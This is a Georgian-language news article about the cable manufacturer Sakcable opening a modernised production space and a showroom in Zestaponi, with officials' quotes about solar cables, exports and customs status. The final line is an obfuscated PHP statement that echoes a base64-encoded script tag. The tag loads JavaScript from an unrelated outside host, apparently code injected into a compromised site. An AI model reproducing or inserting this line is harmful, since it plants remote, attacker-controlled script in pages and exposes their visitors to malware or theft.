celsiusi
ავერსი შნაიდერი

31 ოქტომბერს სს „საქკაბელმა“ ქალაქ ზესტაფონში საწარმოს რიგით მესამე გადაიარაღებული სივრცე და ახალი შოურუმი საზეიმოდ გახსნა.

გახსნის ცერემონიაში მონაწილეობდნენ ეკონომიკისა და მდგრადი განვითარების მინისტრის პირველი მოადგილე რომეო მიქაუტაძე, იმერეთის მხარეში სახელმწიფო რწმუნებული ზვიად შალამბერიძე, სააგენტოს აწარმოე საქართველოში - ლაშა ბოსტაშვილი, ზესტაფონის მერი ვასილ გველესიანი, შემოსავლების სამსახურის საბაჟო დეპარტამენტის უფროსის მოადგილე ელგუჯა ბერანძე, აგრეთვე საჯარო, საბანკო, ელექტროინდუსტრიაში არსებული კომპანიები, პარტნიორები, მედიის წარმომადგენლები და სხვა კერძო სექტორის წარმომადგენლები.

,,დღეს ჩვენი საწარმოს რიგით მესამე გადაიარაღებული მოდერნიზებული სივრცის პრეზენტაცია და ახალი შოურუმის გახნა მოწვეულ სტუმრებთან ერთად გაიმართა. „საქაკბელი“ მომხმარებელს სიახლეებს მუდმივად სთავაზობს. ჩვენი პროდუქციის წარმადობა მზარდია და ტექნოლოგიურად განვითარებადი. ამჯერად აქცენტი განახლებად და მწვანე ენერგიების საკაბელო პროდუქციაზე გვაქვს, რომელიც მთელ მსოფლიოში და მათ შორის, საქართველოშიც დიდი პოპულარობით სარგებლობს. სოლარ კაბელების ევროპული სტანდარტებით წარმოება რამდენიმე თვის წინ დავიწყეთ. დღეს ევროპული სერტიფიკატიც ავიღეთ, რაც ნიშნავს იმას, რომ ჩვენი წარმოებული პროდუქცია ყველა სათანადო სტანდარტს აკმაყოფილებს. ამ პროექტის წასახალისებლად სახელმწიფო მხარდაჭერითაც ვისარგებლეთ. ვფიქრობ, სოლარ კაბელების წარმოებით, ჩვენი კომპანიაც შეიტანს თავის წვლილს საქართველოს ენერგეტიკული უსაფრთხოების ამაღლებაში. გარდა ამისა, ჩვენი ინტერესია, გავზარდოთ „საქკაბელის“ მიერ წარმოებული პროდუქციის ექსპორტი, რაც ქვეყანაში დამატებით სავალუტო შემოსავლებს ნიშნავს.“ - განაცხადა სს „საქკაბელის“ მმართველმა დირექტორმა დავით კაპანაძემ საზეიმო გახსნაზე სიტყვით გამოსვლისას. მისი თქმით, „საქკაბელის“ ახალი საწარმოო ხაზის ამოქმედება მნიშვნელოვანია იმერეთის მხარისა და საკუთრივ ზუსტაფონის მუნიციპალიტეტისა და მისი ეკონომიკის განვითარებისთვის.

039A3990 1

გახსნაზე მოწვეულ სტუმრებს მიესალმა ეკონომიკისა და მდგრადი განვითარების მინისტრის პირველი მოადგილე რომეო მიქაუტაძე. „განახლებული საწარმოო სივრცეში „საქკაბელი“ უშვებს ახალ, ენერგოეფექტურ პროდუქციას, რომელზეც დიდი მოთხოვნაა როგორც საქართველოში, ისე სხვა ქვეყნებში. ჩვენ, სააგენტოს „აწარმოე საქართველოში“ მხარდაჭერით, ვეხმარებით ისეთ პროექტებს, რომლებიც არა მხოლოდ აფართოებენ წარმადობას და ასორტიმენტს, არამედ ქმნიან ახალ სამუშაო ადგილებს, ნერგავენ ახალ ტექნოლოგიებს და თავისი წვლილი შეაქვს ქვეყნის საექპორტო პოტენციალის ზრდაში. ახალი საწარმოო ხაზის ამოქმედება „აწარმოე საქართველოში“ ფარგლებში განხორციებული ინვესტიციით მოხდა. შედეგად, ვხედავთ მოდერნიზებული საწარმოს აღჭურვილს მაღალტექნოლოგიური მანქანა - დანადგარებით. რაც ყველაზე მნიშვნელოვანია საწარმომ ახალი სამუშაო ადგილები შექმნა სწორედ ადგილობრივი მოსახლეობისთვის. „საქკაბელი“ ის კომპანიაა, რომლის ნაწარმიც ექსპორტზეც გადის, ახალი საერთაშორისო ბაზარზე მოთხოვნადი პროდუქციის წარმოება კი ძალიან წაადგება ჩვენი ქვეყნის საექსპორტო პოტენციალის გაზრდას,“ - განაცხადა ეკონომიკისა და მდგრადი განვითარების მინისტრის პირველმა მოადგილე რომეო მიქაუტაძემ.

განახლებული საწარმოს საქმიანობის შესწავლის შემდეგ, „საქკაბელის“ ორგანიზებით, ბიზნესურთიერთობის განვითარების ხელშემწყობი კონფერენცია გაიმართა, რომლის დროსაც კომპანიის მენეჯმენტმა დამსწრე საზოგადოებას „საქკაბელის“ გეგმებისა და სიახლეების, მათ შორის, სოლარ კაბელების წარმოების შესახებ მიაწოდა ინფორმაცია.

კონფერენციის დასრულების შემდეგ შემოსავლების სამსახურის საბაჟო დეპარტამენტის უფროსის მოადგილემ ელგუჯა ბერანძემ კომპანიას ავტორიზებული ეკონომიკური ოპერატორის (AEO) სტატუსის დამადასტურებელი სერტიფიკატები გადასცა. აღნიშნული სტატუსი „საქკაბელს“ ახალ გამარტივებულ საბაჟო შესაძლებლობებს სთავაზობს.

შეგახსენებთ ,,საქკაბელი’’ დღეისთვის აერთიანებს:

  • საწარმოს ზესტაფონში, სადაც როგორც საკაბელო ისე - საიზოლაციო მასალებისა და გოფრირებული მილების წარმოება ხდება;
  • საქართველოს მასშტაბით 8 ოფიციალურ შოურუმს;
  • 40-მდე სადილერო და 300-მდე პარტნიორ მაღაზიას.

კომპანიის სამომავლო გეგმები კი მსხვილი ენერგეტიკული პროექტების განვითარებისკენაა მიმართული.

039A2058 copy 1

308
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");